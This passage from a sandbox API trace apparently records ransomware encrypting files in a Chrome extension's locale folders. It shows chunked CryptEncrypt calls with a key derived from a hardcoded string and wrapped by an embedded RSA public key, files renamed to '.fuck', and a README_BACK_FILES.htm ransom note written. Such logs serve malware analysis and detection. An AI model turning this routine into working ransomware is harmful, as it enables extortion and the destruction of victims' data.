lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.103] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.103] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.104] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.104] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0264.104] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.104] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x41, lpOverlapped=0x0) returned 1 [0264.104] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x41, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x50) returned 1 [0264.104] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x50, lpOverlapped=0x0) returned 1 [0264.104] CloseHandle (hObject=0x5d5c) returned 1 [0264.104] CloseHandle (hObject=0x5d60) returned 1 [0264.104] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0264.107] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0264.108] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0264.109] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0264.110] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.110] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.110] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.110] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0264.110] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0264.110] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0264.110] AreFileApisANSI () returned 1 [0264.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0264.110] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.111] GetFileType (hFile=0x5d64) returned 0x1 [0264.111] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0264.112] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.112] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0264.112] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.113] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0264.113] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0264.113] GetLastError () returned 0x0 [0264.113] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json")) returned 0x20 [0264.113] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0264.113] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.114] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0264.115] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0264.116] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0264.117] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0264.117] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.117] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.118] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0264.118] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.118] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0264.118] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e767e8) returned 1 [0264.118] CryptImportPublicKeyInfo (in: hCryptProv=0x2e767e8, dwCertEncodingType=0x1, pInfo=0x2eafbf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eafc20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eafc28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ee40) returned 1 [0264.118] CryptEncrypt (in: hKey=0x2e7ee40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0264.118] CryptEncrypt (in: hKey=0x2e7ee40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75ff0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75ff0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0264.118] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e75ff0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75ff0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0264.119] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0264.127] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 